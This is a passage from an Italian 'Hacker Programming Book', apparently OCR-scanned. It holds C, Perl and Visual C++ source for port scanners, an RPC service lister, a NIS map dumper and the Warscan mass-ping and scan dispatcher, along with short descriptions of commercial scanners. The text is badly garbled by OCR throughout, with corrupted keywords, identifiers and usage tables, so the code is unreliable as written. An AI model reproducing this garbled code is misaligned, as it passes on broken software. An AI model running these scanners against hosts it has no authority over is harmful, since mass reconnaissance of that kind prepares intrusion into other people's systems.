fprintf (stderr , " —t 
fprintf (stderr , " —u 
fprintf (stderr , " —r 
fprintf (stderr , " —n 
fprintf (stderr , " —v 
fprintf (stderr, " -h 



ype> <host> [low port] [high port]\n", s) ; 
s one of: \n ") ; 

- TCP port scan\n") ; 

- UDP port scan\n") ; 

- RPC service list\n") ; 

- NIS map listing\n") ; 

- Print version information\n") ; 

- Print usage information\n") ; 

- TCP port scan\n") ; 

- UDP port scan\n") ; 

- RPC service list\n") ; 

- NIS map listing\n") ; 

- Print version information\n") ; 

- Print usage information\n") ; 



iendif 

fprintf (stderr, "\n") ; 
exit (0) ; 

} 

void get args (n, v) 
int n; 
char *v[] ; 
{ 

int c; 

int opt_ind; 



scantype = s none; 
while (true) { 

iifdef GNU_LIBRARY 

c = getopt_long (n , v , "turnhv" , long_options, &opt__ind) ; 

ielse 

c = getopt (n,v, "turnhv") ; 

iendif 

if (c == -1) 
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swltch(c) { 

iifdef GNU__LIBRARY 

case 0 : 

opt_ind++; /* index ' s are one less than the scan type */ 
if (opt_ind == 5) 

print_usage (v[0] ) ; 
if (opt_ind == 6) 

print_version (v[0] ) ; 
scan_type = opt^ind; 
break; 

iendif 

case ' t ' : 

scan_type = s_tcp; 

break; 
case ' u ' ; 

scan_type = s_udp; 

break; 
case ' r ' : 

scan_type = s_rpc; 

break; 
case 'n ' : 

scan_type = s_nis; 

break; 
case ' v ' : 

print^version (v[0] ) ; 

break; 
case 'h ' : 

case '?' : 

print_ usage (v[0] ) ; 
break; 

} 

} 

low_port = DEFAULT_LOW_PORT; 
high_port = DEFAULT_HIGH_PORT ; 

for (opt_ind = 0 ; optind < n; optind++) { 
switch (opt_ind++) { 
case 0: /* remote host */ 

strncpy (remote_host , v [optind] , 199) ; 
break; 
case 1 : /* low port */ 

low jport = atoi (v [optind] ) ; 

break; 
case 2: /* high port */ 

high _port = atoi (v [optind] ) ; 
break; 

} 

} 

if ( (opt^ind == 0) Il (scan type == s none) ) { 

fprintf (stderr, "error: you must specify a scan type and a host\n") ; 
print_ usage (v[0] ) ; 

} 

} 

void check args() 
{ 

struct hostent *host; 

host = gethostbyname (remote host) ; 

if (host == NULL) { 

unsigned char a,b, c, d, n; 

char addr[5]; 

/* hmm. . perhaps it was a dotted quad entered. . */ 
n = sscanf (remote^host , " %u . %u . %u . %u" , Sa, &b, Se, Sd) ; 
if (n != 4) { 

fprintf (stderr, "error : host ' %s ' not found\n" , remote_host) ; 
exit(l); 

} 

addr[0] = a; 
addr[l] = b; 
addr[2] = c; 
addr[3] = d; 
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if (host == NULL) { 

fprintf (stderr, "errar : host '%s' not found\n " , remote_host ) ; 

exit(l); 

} 

sprint f (remote_±p, "%u . %u . %u. %u ", a,b, c, d) ; 
} else { 

sprint f (remote_ip, "%u . %u . %u . %u ", 

(unsigned char) host->h_addr_list [0] [0] , 
(unsigned char) host->h_addr_list [0] [1] , 
(unsigned char) host->h_addr_list [0] [2] , 
(unsigned char) host->h__addr_list [0] [3] ) ; 

} 

} 

void print__args () 
{ 

static char *opt_table[] = { 
"tcp", "udp", "rpc", "nis" 

}; 



fprintf (stdout, "scanning host %s's %s ports " , remote^host, 

opt_table [scan_type-l ] ) ; 
if (scan_jtype < 3) { 

fprintf (stdout, "%d through %d" , low_port , highjport ) ; 

} 

fprintf (stdout, "\n") ; 



int scan() 
{ 

int soc; 

struct sockaddr_in addr; 
struct servent *serv; 
int port, re, addr_len, opt; 



if (scan_type >= 3) /* this proc only does tcp and udp */ 
return; 

for (port = low_port ; port <= high_port ; port++) { 

if (scan_type == s_tcp) { 

soc = socket (AF_INET, SOCK^STREAM, IPPROTO_TCP) ; 
} else if (scan_type == s_udp) { 

soc = socket (AF INET, SOCK DGRAM, IPPROTO_UDP) ; 
} else 

return; 

if (soc < 0) { 

fprintf (stderr, "error: socket () failed\n") ; 
return; 

} 

re = setsockopt (soc, SOL SOCKET, SO REUSEADDR, &opt, sizeof (opt) ) ; 
addr . sin_family = AF_INET; 

addr . sin_addr . s_addr = inet_addr (remote_ip) ; 
addr . sin_port = htons (port) ; 

addr len = sizeof (addr) ; 

re = connectfsoc, (struct sockaddr*) Saddr, addr len) ; 

if (scan_type == s_udp) { 

/* UDP port scanning is not easy. . it sux */ 

/* dunno how I 'm gonna implement it . . not implemented right ne» */ 

} 

dose (soc) ; 



if (re < 0) 
continue; 

if (scan_type == s_tcp) 

serv = getservbyport (htons (port) , "tcp") ; 
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serv = getservbyport (htons (port) , "udp") ; 
else 

return; 

fprintf (stdout, "port %d (%s) is running\n " , port , (serv == 
NULL) ? "UNKNOWN" : 

serv—>s_name) ; 

} 

} 

/* next two routines ripped front ypcat with a few mods */ 
int callback proc (is, ik, ikl, iv, ivi, id) 

int is; 
char *ik; 
int ikl; 
char *iv; 
int ivi; 
char *id; 
{ 

if (is != YP_TRUE) 

return is; 
return 0; 

} 

void nis_dump() 
{ 

int i, re; 

char *domainname; 

char *map; 

struct ypall_callback callback; 
domainname = Sremote host [0] ; 

for (i = 0; yp__maps [i] .mapname != NULL;i++) { 
key = 0; 

callback . foreach = callback proc; 
callback. data = NULL; 
map = yp_maps [i] . mapname; 
re = yp ali (domainname, map, Scallback) ; 
switch (re) { 
case 0 : 

printf ("%-10 . lOs is available\n" , yp_maps [i] . alias) ; 
break; 
case YPERR_ YPBIND : 

fprintf (stderr, "error: server is not running ypbind\n") ; 
exit (1) ; 
break; 
default: 

fprintf (stderr, "error: %s\n" , yperr_string (re) ) ; 
exit(l); 

} 

} 

} 

/* this routine basically ripped from rpcinfo —p */ 

void rpc_scan () 

{ 

struct sockaddr in server addr; 
register struct hostent *hp; 
struct pmaplist *head = NULL; 

int socket = RPC__ANYSOCK; 
struct timeval minutetimeout ; 
register CLIENT *client; 
struct rpcent *rpc; 

minutetimeout . tvsec = 60; 
minutetimeout . tvusec = 0; 

server__addr . sin^addr . s__addr = inet^addr (remote_ip) ; 
server_addr . sin_family = AF_INET; 
server^addr . sin_port = htons (111) ; 

if (( client = clnttcp_create (&server_addr, PMAPPROG, 
PMAPVERS, Ssocket, 50, 500) ) == NULL) { 

clnt_pcreateerror ("rpcinfo: can't contact portmapper") ; 
exit (1) ; 
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if (clnt^call (client , PMAPPROC_DUMP , xdr_void, NULL, 

xdr_pmaplist, &head, minutetimeout) != RPC_SUCCESS) ( 

fprintf (stderr, "rpcinfo: can't contact portmapper: ") ; 
clnt_perror (client , "rpcinfo") ; 
exit (1) ; 

} 

if (head == NULL) { 

printf ("No remote programs registered.\n") ; 

} else { 

printf (" program vers proto port\n") ; 
for (; head != NULL; head = head—>pml next) { 
printf ("%101d%51d", 

head—>pml_map .pm_prog, 
head->pml_map . pm__vers ) ; 
if (head->pml_map.pm_prot == IPPROTO_UDP) 

printf ("%6s", "udp"); 
else if (head->pml_map.pm_prot == IPPROTO_TCP) 

printf ("%6s", "tcp"); 

else 

printf ( "%61d", head->pml_map .pm_prot) ; 
printf ("%71d", head—>pml_map.pm_port) ; 
rpc = getrpcbynumber (head->pml_map . pm_prog) ; 
if (rpc) 

printf ( " %s\n ", rpc->r__name) ; 

else 

printf ("\n") ; 

} 

) 

} 

int main (argc, argv) 
int argc; 
char *argv[ ] ; 

{ 

get__args (argc, argv) ; 
check_args () ; 
print_args () ; 

/* this will only do tcp and udp, otherwise returns without doing 
anything */ 

switch (scan_type) { 
case s_tcp: 
scan () ; 
break; 
case s_udp: 

fprintf (stderr, "UDP port scanning is not implemented in this version\n") ; 

break; 
case s_rpc: 

rpc_scan () ; 
break; 
case s_nis: 

nis dump () ; 

break; 

} 

return 0; 



Scanner commerciali e shareware 

La scrittura di alcuni programmi relativi allo scanning orientato all'identificazione delle porte 
aperte su di un determinato sistema possiede come scopo quello di mostrare il principio di 
funzionamento dei test eseguibili al fine di rilevare tali informazioni. 

Alcuni software che sono venduti o che comqunue sono prelevabili dala rete in versione 
shareware possiedono spesso dei meccanismi di analisi che si mostrano particolarmente 
potenti in questa fase in cui la cosa importante è quella di ricavare il maggior numero di 
informazioni disponibili su un sistema remoto. 

Uno dei software più recenti è quello chiamato Nscan della NECROSOFT. 
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Il programma viene venduto per un inezia ovvero 19$ ma per vconto mio li vale in quanto è in 
grado di andare oltre a quelle che sono le normali informazioni ritornate da uno scanner 
normale. 




2] 15863 1 UU[> :ullll|||||||||i 



Le funzioni sono abbastanza simili a quelle degli altri scanner per quello che riguarda le 
indagini relative alle porte aperte su degli IP i quali posso essere specificati singolarmente o 
come interi range. 




L'utility è in grado di emettere diversi tipi di logs. 

Sono inoltre inclusi dentro a NSCAN alcune Utilities con il traceroute, whois e nslookup. 
Le opzioni che possono essere specificate sulla linea di comando sono : 



short long <parameters> descrlption 



-i -ini <start address> start hostname 
-f -fin <end address> end hostname 
-p -ports <ports> port list 
-F -list <list file> list file name 
-1 -log <log file> log file name 

-N -forget don't write updated settings to registry 
-t -tray run and minimize to tray / do nothing 
-S -scan start with defaults - just scan 
-k -keepalive don 't dose after job is done 
-n -nohide keep restored 

-a -atype <type> address type (0-4) respectively in drop-down order 
-P -porttype <port list type> same for port type 
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-d -outdetail <outdet> output details (see drop-down mode switch) 

-D -logdetail <log detall level> sante for log 

-T -condetail <detail level> sanie numbers as for log detall 

-R -conformat <format> format for console output (options) 

-C -console <flle> console file name (default is console.log) 



Un altro scanner si chiama NETBRUTE. 

Anche in questo caso il programma dispone di diverse opzioni tra cui una destinata all'analisi 
dei WEBSERVER. 
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NETBRUTE svolge anche altre funzioni che non sono propriamente quelle dello scanner 
legato alle porte. 

Una delle sue funzioni è quella dell'enumerazione delle condivisioni di un sistema. 

Pur essendo un ottimo strumento non viene fornito con un help per cui almeno in una delle 

funzionalità del programma il suo scopo è abbastanza nascosto. 

Sempre tra i portscanner di ottima qualità c'è SUPERSCAN 3.0 
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Gli scanner visti fino ad adesso erano indirizzati al protocollo TCP. 
Uno indirizzato al protocollo UDP prelevabile dal sito : 



Questo programma si chiama WUPS e possiede come limitazione il fatto che può eseguire lo 
scannino di un solo host alla volta. 



WUPS 1,4- Copyright 1 996-99, Àine Vìdslrnm 
WUPS - Windows UDP Part Scanner 
hHpVrWww.iriatcurity.ni^oolboa/nnipsr 1 



IP lo scan: |1 27-ll-D.l 
Stari pari: (l 

!?50 



| Start San | 
Stop pnrt |EBE3E strip i;r.,m 



Statue: [""«V 

Open UDP 
porta: 




Esistono dei programmi sulla rete che permettono di automatizzare gli scan associandoli 

anche a determinati test che devono essere eseguiti sugli hosts. 

Ne è un esempio WARSCAN scritto interamente in PERL il quale può eseguire lo scan 

partendo da una lista di host fornita sul file oppure può generare direttamente gli hosts da 

testare. 

In altre parole grazie a WARSCAN chiunque può creare dei test da applicare a grossi numeri 
di hosts. 

Il sorgente è quello che segue : 

# .' /usr/bin/perl 
§ 

# Warscan, an Internet Scanner Dispatch 

§ Copyright (C) 1998 nocarrier@darkridge.com 

« 
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# This program is free software ; you cari redistribute it and/or modify 

# it under the terms of the GNU General Public License as published by 

# the Free Software Foundation; either version 2 of the License, or 
§ (at your option) any later version. 

# 

# This program is distributed in the hope that it will be useful, 
§ but WITHOUT ANY WARRANTY; without even the implied warranty of 

# MERCHANTABILITY or FITNESS FOR A PAR TICULAR PURPOSE . See the 

# GNU General Public License for more details . 
§ 

# You should have received a copy of the GNU General Public License 

# along with this program; if not, write to the Free Software 

# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 
# 

require 5.004; 

use POSIX qw ( : signal_h) ; 

use Getopt : : Std; 

use Socket; 

use Cwd; 

### System ### 
$Version = "0.7"; 
$PatchLevel = "2"; 

$1 = 1; 
$PID = $$; 

$SigSet = POSIX: : SigSet—>new (SIGINT) ; 
$OSigSet = POSIX: : SigSet->new ( ) ; 

### Behaviour ### 
$Dispatch = "scan"; 
$DumpFile = "servers" ; 
$ArgPrepend = ""; 
$ArgAppend = ""; 
$Target = ""; 

$MaxPing = 10; 
$MaxScan = 20; 
$IPLimit = 254; 
$PingTimeout = 2; 
$ExtraOutput = 0; 

$Prepared = 0; 
$Verify = 1; 
$Debug = 0; 
$Dump = 1; 



################# 
### Functions ### 
################# 

sub ParseCommandLine { 
my ( %Options) ; 

$State = "parse"; 

getopts ("hvVDpenf: s :P : S :d:A:B:o:L:t : ", \%Options) ; 

(&Usage() andexit(O)) if (defined($Options{ 'h' }) ) ; 
(&Version() and exit (0) ) if (defined($Options{'v'})); 



($MaxScan 


= $Options{ 'S ' }) 


if 


(defined ($Options { 'S '}) ) ; 


( $ArgAppend 


= $Options{ 'A ' }) 


if 


(defined ($Options { 'A' })) ; 


( $ArgPrepend 


= $Options{ 'B ' } ) 


if 


(defined ($Options { 'B ' } ) ) ; 


($Dest 


= $Options{ 'd' }) 


if 


(defined ($Options { ' d ' } ) ) ; 


($IPLimit 


= $Options{ 'L ' }) 


if 


(defined ($Options { 'L ' } ) ) ; 
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( ($PingTimeout = $Opt±ons { ' t ' } ) and ($Verify = 1) ) 

if (defined ($Opt±ons { ' t ' } ) ) ; 
(($DumpF±le = $Optlons{ 'o' }) and ($Ver±fy = 1) and ($Dump = 1) ) 

if (defined ($Options { 'o ' } ) ) ; 



($Dump 



= 0 



) if (defined ( $Options{ 'n' })) ; 



die "fatai: option conflict: -n and -o cannot be speci fied. \n" 
if (defined ($Options{ 'o' }) and 
defined ($Options { 'n ' }) ) ; 

$Target = $ARGV[0] ; 

if (defined ($Options{ '£• }) ) { 

my($file) = $Options { ' f ' } ; 



template . \n' 



} else { 



($dotcnt > 3) , 



die "fatai : either load a file or generate f rotti 

if ($Target) ; 
die "fatai: $file not found or not readable.\n" 
unless (-r $file) ; 

$Mode = "load"; 
$Type = "file"; 
$Target = $file; 



(SUsage () and exit) 

if ($Target eq ""); 

$Mode = "build"; 

$Type = "DNS " if (!$Type and $Target =~ / [a-zA-Z] /) ; 
$Type = "IP" if (!$Type); 

my ($dotcnt) ; 

$dotcnt++ while ($Target =~ /\./g); 

if ($Type eq "IP") { 

die "fatai: unknown address speci fied. \n" if 



for ($i = $dotcnt; $i < 3; $i++) { 

$Target .= "\. \%"; 

} 



} 

($ExtraOutput =2 ) if (defined($Options{'e'})); 

($Debug =2 ) if (defined($Options{'D'})); 

($Verify =0 ) if (defined ($Options{ 'V } ) ) ; 

(($MaxPing = $Options{ ' P • } ) and ($Verify = 1) ) 

if (defined ($Options { 'P ' }) ) ; 

($PingScan = $Options{ 'p ' } ) if (defined($Options{'p'})); 

($Dispatch = $Options{ ' s' }) if (defined($Options{'s'})); 

die "fatai: option conflict: -p and -s cannot be speci fied\n" 
if (defined ($Options { ' s ' }) and 
defined ($Options { 'p ' } ) ) ; 

if (not $PingScan) { 

my($ found) = SCheck ($Dispatch) ; 

die "fatai: $Dispatch not found in \$PATH\n" 

if (not $ found) ; 
$Dispatch = $found; 

} else ( 

die "fatai: must be root to ping scan\n" if ($>) ; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



if (not $Verify) ; 

} 

if ($> and $Verify) { 

warn "+ Warning: disabling verificatimi without root 

priveleges . \n"; 

$Verify = 0; 

} 

} 



sub Check { 

my ($path, Qpaths, $found, $file) ; 

$file = shift; 
$found = 0; 

Qpaths = ($BaseDir) ; 

push @paths, split (':', $ENV{ 'PATH ' } ) ; 

foreach $path (@paths) { 

$path =~ s/([*\/l)$/$l\//; 

} 

while (Qpaths and ! $found) { 

$path = shift @paths; 
$program = $path . $file; 
($found = 1) if (-x "$program") ; 

} 

return ($found?$program:undef) ; 

} 



sub LoadServers { 

my ($file) = shift; 
my ( @servers) ; 

open (F, $ file) or die "fatai: can't open server file: $!\n"; 
chop (@ server s = <F>) ; 

close(F) or warn "+ Warning: couldn't dose server file?\n"; 

die "fatai: no servers read from [$file] \n" if ( ! Qservers) ; 
print "+ Read in [", scalar (Qservers) , "] servers from file.\n"; 

return Qservers; 

} 



sub Generate { 

my ($limit) = $IPLimit; 
my($i, $n, Qsites) ; 

my (Stempiate) = shift; 

print "+ Generating server list . . . "; 
$State = "generate"; 

$n++ while (Stempiate =~ /%/g) ; 
Qsites = (Stempiate) ; 

while (Stempiate =~ m/%/g) { 

foreach $site (Qsites) { 

for ($i=l; $i <= $limit; $i++) { 
($_ = $site) =~ s/%/$i/; 
push @expanded, $_; 
} 

} 
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Qsites = Qexpanded; 
Qexpanded = () ; 

} 

prlnt " (", scalar (@s±tes) , ") generated. \n"; 
return @sites; 

} 



sub Valldate { 

my(@Sites) = @_; 

my (@sitebuf, Qvalbuf) ; 

my ($scancnt) ; 

prlnt "+ Validation beginning. \n" ; 
$State = "valldate"; 

$proto = getprotobyname ( ' Icmp ' ) ; 
socket (SOCK, PF_INET , SOCK_RAW, $proto) 

or die "fatai: couldn't create socket In Valldate (): 

$!.\n"; 

for ('0' .. Int ($#Sltes / $MaxPlng) ) { 

Qsltebuf = spllce (@Sltes, 0, $MaxPlng) ; 
@valbuf = Smassplng (Qsltebuf) ; 
push @valldated, @valbuf; 
$scancnt += scalar (Qsltebuf) ; 

prlnt "+ Validated [", scalar (@valbuf) , " of ", 

scalar (@sltebuf) , 

"] (", scalar (Qvalldated) , 
" of $scancnt total). \n"; 

} 

prlnt "+ Validation complete . \n"; 
return Qvalidated; 

} 



sub Prepare { 

$ State = "prepare" ; 
my($dir) = shift; 

$BaseDir .= "/$dir"; 

prlnt "+ Destination is [$BaseDir] . \n" ; 
mkdir("$BaseDir",0755) if (! -d "$BaseDir") ; 
chdir ( "$BaseDir ") 

or warn "+ Warning: could not prepare, using current 

directory. \n"; 

$Prepared = 1; 

} 



sub Dump { 

my(@array) = @_; 

my($dumpdir) = $BaseDir?"$BaseDir" : "/tmp" ; 

my ($dumpfile) = (substr ($DumpFile, 0, 1) ne "/") 

? "$dumpdir/$DumpFile " 

: "$DumpFile" ; 

$State = "dump"; 

prlnt "+ Dumping servers to [$dumpfile] . \n" ; 
open(F, ">$dumpfile") 

or warn "+ Warning : couldn 't open server dump 

file. \n"; 

prlnt F join("\n",@array), "\n" if (fileno (F) ) ; 
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dose (F) 

or warn "+ Warnlng: could not dose server dump 

file. \n"; 
} 



sub Probe { 

my ($Server) = shift; 
return unless $Server; 

$Level++; 

$State = "recurse-$Level"; 
my($Pipe) = "pipe-$Server-$Level" ; 

sigprocmask (SIG_BLOCK, $SigSet, $OSigSet) ; 

my($daddy) = open ($Pipe, "- \ " ) ; 
if (not defined $daddy) { 

warn "+ Warning: [$Server] fork() errori $!\n"; 

sigprocmask (SIG_UNBLOCK, $OSigSet) ; 

sleep(l) ; 
} elsif (!$daddy) { 

my(@args) ; 

$SIG{INT} = ' IGNORE ' ; 

sigprocmask (SIG_UNBLOCK, $OSigSet) ; 

push @args, split ( ' ' , $ArgPrepend) ; 

push @args, $ Server; 

push @args, split ( ' ' , $ArgAppend) ; 



} else { 
} 

SProbe (@_) ; 



exec ($Dispatch, Qargs) ; 

sigprocmask (SIG_UNBLOCK, $OSigSet) ; 



if ($ExtraOutput) { 

@lines = <$Pipe>; 

print @lines if (Qlines) ; 

} 

dose $Pipe; 

print "+ Probed: $Server\n" if ($Debug) ; 



sub Catch { 

print "+ ($$) BREAK: $State.\n"; 

$_ = $State; 

SWITCH: { 

/validate/ and do { 

if ($Dump) { 

my ($state) = $State; 

SPrepare ($Dest) if ($Dest and not $Prepared) ; 
&Dump (Qvalidated) ; 
$State = $state; 

} 

last SWITCH; 

}; 

/generate/ and do { 

print "+ Stopping in IP Generation . \n" ; 
last SWITCH; 

}; 

/recurse/ and do { 
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join ( ' , ' , @Servers) ; 



my ($Unscanned, @Onscanned) ; 

SPrepare ($Dest) if ($Dest and not $Prepared) ; 

$Unscanned = join ( ' , ' , QBuffer) . ' , ' . 

gUnscanned = split (' , ' , $Unscanned) ; 
SDump (@Unscanned) ; 

} 

last SWITCH; 



}; 

} 

print "+ Exiting . \n" ; 
exit; 

} 



sub massping { 

$icmp_struct = "C2 S3 AO"; 
$ICMP_ECHO = 8; 
$ICMP_ECHOREPLY = 0; 

my (Qhosts) = @_; 
my(@valid) = () ; 

my ($count, $seq, $host, $checksum, $msg, $len_msg, $ finish) ; 

my ($iaddr, $saddr, $rbits) ; 

my ($resp, $recv_msg, $timeout) ; 

my ($f_saddr, $f_iaddr, $f jport, $f_type, $f_subcode, $f_chk, 
$f _pid, $f_seq, $f_msg, $f_host) ; 

$count = scalar (Qhosts) ; 
$seq = 0; 

foreach $host (@hosts) { 
$seq++; 
$checksum 

= Schecksum(pack($icmp_struct, $ICMP_ECHO, 0, 0, 

$$, $seq, "")); 

$msg = pack ($icmp_struct, $ICMP_ECHO, 0, $checksum, 

$$, $seq, ""); 

$len_msg = length ($msg) ; 

print "ping SEND: host [$host] seq[$seq] 

cksum[$checksum] \n " 

if ($Debug) ; 

$iaddr = inet_aton ($host) ; 
$saddr = sockaddr_in(0, $iaddr) ; 

send(SOCK, $msg, 0, $saddr) ; 

} 

$rbits = ""; 

vec($rbits, fileno (SOCK) , 1) = 1; 

$timeout = $PingTimeout ; 

$ finish = time() + $timeout; 

while ($count and $timeout > 0) { 

$timeout = $ finish - time(); 

if ($resp = select ($rbits, undef, undef, 1) ) { 
$recv_msg = ""; 

$f_saddr = recv (SOCK, $recv_msg, 1500, 0) ; 

($f _port, $f_iaddr) = 
unpack_sockaddr_in ($f_saddr) ; 

$f_host = gethostbyaddr($f_iaddr,AF_INET); 
$f_host = "unkown" if (not $f_host) ; 

($f_type, $f_subcode, $f_chk, $f_pid, $f_seq, 

$f_msg) = 
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$len_msg, 



pid[$f_pid] 



substr ($recv_msg, length ($recv_msg) - 
$len_msg) ) ; 

prlnt "plng REPLY: type [$f_type] ±p[$f_host] 

"seq[$f_seq] . \n" if ($Debug) ; 
if (($f_type == $ICMP_ECHOREPLY) and 
(not deflned $seen{$f_host} ) ) { 
push (@val±d, $hosts [ $f_seq-l ] ) ; 
$count — ; 

$seen { $f_host } ++; 



return Qvalid; 



sub checksum { 

my($msg) = shift; 

my ($len_msg, $num_short, $short, $chk) ; 

$len_msg = length ($msg) ; 
$num_short = $len_msg / 2; 
$chk = 0; 

foreach $short (unpack ("S$num_short", $msg) ) { 
$chk += $ short; 

} 

$chk += unpack ("C", substr ($msg, $len_msg - 1, 1) ) if $len_msg % 2; 
$chk = ($chk » 16) + ($chk & Oxffff); 
return (~(($chk » 16) + $chk) & Oxffff); 



sub Date { 

my ($min, $hour) = (localtime) [1, 2] ; 

return (sprint f "%02d:%02d", $hour, $min) ; 

} 



sub Version { 

print "\nThis is Warscan v$Version . $PatchLevel . \n\n" ; 

} 



sub Usage { 

print "\n[$Version. $PatchLevel] warscan [options] [host template] \n" ; 
print " options are:\n"; 

print " -s <script> Run script with generated host list . Default is 
\ "scan\". \n"; 

Read in host list from file, 1 per line. \n"; 
File to dump verified servers to. De fault is 



print " -f <file> 

print " -o <file> 
\ "servers\". \n"; 

print " -d <dir> 

print " -A <str> 
hostname . \n"; 

print " -B <str> 
hostname . \n"; 

print " -P <num> 
10. \n"; 

print " -S <num> 
20. \n"; 

print " -li <num> 
254. \n 



Put results/run in directory \"dir\" . \n"; 
Arguments to pass to the script after the 

Arguments to pass to the script before the 

Number of pings to run in parallel . Default is 

Number of scans to run concurrently . De fault is 

Upper limit for IP/DNS generation . De fault is 
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prlnt " 


-n 


No server dump file. Don't attempt to save 


anythlng. \n"; 






prlnt " 


-e 


Extra output . Walt for and prlnt output front 


scripts. \n"; 






prlnt " 


~P 


Plng scan only. Only plng hosts, don't run 


scan . \n "; 






prlnt " 


-D 


Turn on debugging. Increases verboslty . \n" ; 


prlnt " 


-V 


Turn off verlflcatlon phase.\n"; 


prlnt " 


-v 


Prlnt verslon Information and exit . \n "; 


prlnt " 


-h 


What you're readlng now.\n\n"; 



} 



### MAIN ### 
############ 

$SIG{INT} = \&Catch; 
$BaseDlr = fastcwdf) ; 

die "fatai: could not get current directory ! \n" 
if ( !$BaseDir) ; 

SParseCommandLlne () ; 

prlnt "+ [$Version . $PatchLevel] Warscan is running (PID: $PID).\n"; 

if ($Type eq "file") { 

@Servers = SLoadServers ($Target) ; 

} 

prlnt "+ Target is [$Target] (Mode: $Mode, Type: $Type)\n"; 
prlnt "+ Script is [$Dispatch] \n" ; 

prlnt "+ Doing Plng Scan, $MaxPing hosts at a time. \n" 
if ($PingScan) ; 

if ($Type ne "file") { 

@ Server s = SGenerate ($Target) ; 

} 

&P repare ($Dest) if ($Dest and not $Prepared) ; 
QServers = SValidate (QServers) if ($Verify) ; 

SDump (QServers) if ( ($Mode ne "file") and $Verify and $Dump) ; 

(prlnt "+ Plng Scan complete. \n" and exit) 
if ($PingScan) ; 

$ScanCount = 0; 

$ServCount = $ServTotal = scalar (QServers) ; 

die "+ Nothing to probe ! \n" if ( ! $ServCount) ; 

prlnt "+ Probe beginning. \n"; 

for ('0' .. int ($#Servers / $MaxScan) ) { 

QBuffer = splice (QServers, 0, $MaxScan) ; 

$Level = 1; 

SProbe (QBuffer) ; 

$ServCount = scalar (QServers) ; 
$ScanCount += scalar (QBuffer) ; 

prlnt "+ Probe Results: (", int ( ($ScanCount/$ServTotal) *100) , "\%) ", 
"$ScanCount probed, $ServCount left . \n "; 

} 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



prlnt "+ Probe complete . \n" ; 



la sintassi d'uso di WARSCAN è la seguente : 



[0 . 7.1] warscan 
options are: 

-s <script> 
"scan " . 

-f <file> 

-o <f±le> 
"servers " . 

-d <dir> 

-A <str> 

-B <str> 

-P <num> 

-S <num> 

-L <num> 

-t <num> 

-n 

-e 

~P 
-D 
-V 
-v 



[options] [host template] 

Run script with generated host list . Default is 

Read in host list from file, 1 per line. 
File to dump verified servers to. De fault is 

Put results/run in directory "dir". 

Arguments to pass to the script after the hostname. 
Arguments to pass to the script before the hostname. 
Number of pings to run in parallel . Default is 15. 
Number of scans to run concurrently . Default is 25. 
Upper limit for IP/DNS generation . De fault is 254. 
Ping timeout. Default is 2 (seconds) . 
No server dump file. Don't attempt to save anything. 
Extra output. Wait for and print output from scripts . 
Ping scan only. Only ping hosts, don't run scan. 
Turn on debugging. Increases verbosity . 
Turn off verification phase . 
Print version information and exit . 



Lo scanning delle porte attive viene eseguita mediante particolari programmi i quali, dopo 
avergli fornito un determinato IP, testano la preseanza di porte aperte sul sistema di 
destinazione. 

Un programma scritto in visual C++ che esegue questa analisi è il seguente : 

iinclude <windows.h> 
iinclude <std±o.h> 

void main ( int argc, char *argv[ ], char *envp[ ] ) 
{ 

if C (argc < 2) Il (argc>4) ) 
{ 

print f ( "Usage : scanip <ip_addr> [<start_port> [<stop__port>] ]\n" ) ; 
return; 

} 

if (sizeof (argv[l] ) >255) 
{ 

print f ( "invalid ip address . \n ") ; 
return; 

} 

char ipAddr [15] ; 

char hostName [255] ; 

int hnLength=0 ; 

struct hostent *heHost=NULL; 

u_long ialP; 

wsprintf (ipAddr, "%s ", argv[l ] ) ; 

iaIP=inet_addr (ipAddr) ; 
if (iaIP==INADDR_NONE) 
{ 

hnLength=0; 

while(argv[l] [hnLength] !='\0 ') 
{ 

hostName [hnLength ] =argv[ 1 ] [hnLength ] ; 
hnLength++ ; 
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printf ("Not an ip, possible is a host name: %s, unsupported 
yet . \n ", hostName) ; 

return; 
/* 

heHost=gethostbyname ( (const char FAR *) hostName) ; 

if (heHost==NULL) 

{ 

printf ("IP or Host Name Unknown\n") ; 
return; 

} 

iaIP=* ( (long *) (heHost->h__addr) ) ; 
*/ 

} 

int startPort=0; 
if (argc>2) 

startPort=atoi (argv[2] ) ; 

printf ( "Scanning From: %d " , startPort) ; 

int stopPort=OxFFFF; 
if (argc>3) 

stopPort=atoi (argv[3] ) ; 

printf ("To: %d\n" , stopPort) ; 

WS ADATA dWSAData; 

dWSAData . wVersion=0; 

int tstResult; 

if ( (tstResult=WSAStartup (0x0201, SdWSAData) ) 1=0) 
{ 

printf ( "WSAStartup failed %d. tstResult) ; 
return; 

} 

SOCKET tstSocket; 
struct sockaddrin sinLocale; 
struct sockaddr__in sinRemote; 

tstSocket=socket (AF_INET, SOCK^STREAM, IPPROTO__TCP ) ; 

if (tstSocket==INVALID_SOCKET) 

{ 

printf ( "Error when create socket . . . \n ") ; 
return; 

} 

sinLocale . sin__addr . s^addr = htonl (INADDR_ANY) ; 
sinLocale . sin_family=AF_INET; 

if (bind (tstSocket, 

(const struct sockaddr FAR *) SsinLocale, 
sizeof (sinLocale) ) ==SOCKET_ERROR) 

{ 

closesocket (tstSocket) ; 

printf ( "Error when bind socket . . . \n ") ; 
return; 

} 

sinRemote . sin_addr .S_un. Saddr=iaIP ; 
sinRemote . sin_family=AF_INET; 

struct fd__set fdSet; 

struct timeval tmvTimeout={0L, OL) ; 

FD_ZERO (SfdSet) ; 

FD_SET (tstSocket, SfdSet); 

tstResult=select (0, SfdSet, NULL, NULL, StmvTimeout) ; 

while (startPort<=stopPort) 
{ 

sinRemote . sin_port=htons (startPort) ; 

printf ("Try connected to: %s : %d" , argv[l] , startPort) ; 
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(const struct sockaddr FAR *) SsinRemote, 
sizeof (sinRemote) ) ; 
If (tstResult ! =SOCKET__ERROR) 
{ 

closesocket (tstSocket) ; 
printf(" Success\n") ; 

} 

else 
{ 

tstResult=WSAGetLastError () ; 

switch (tstResult) 

{ 

case WSANOTINITIALISED: 

pr±ntf( " Fall (WSANOTINITIALISED) \n ") ; 
break; 
case WSAENETDOWN: 

printf(" Fall (WSAENETDOWN) \n" ) ; 
break; 
case WSAEADDRINUSE : 

printf( " Fall (WSAEADDRINUSE) \n ") ; 
break; 

case WSAEINTR : 

printf( " Fall (WSAEINTR) \n ") ; 
break; 
case WSAEINPROGRESS : 

printff " Fall (WSAEINPROGRESS) \n ") ; 
break; 
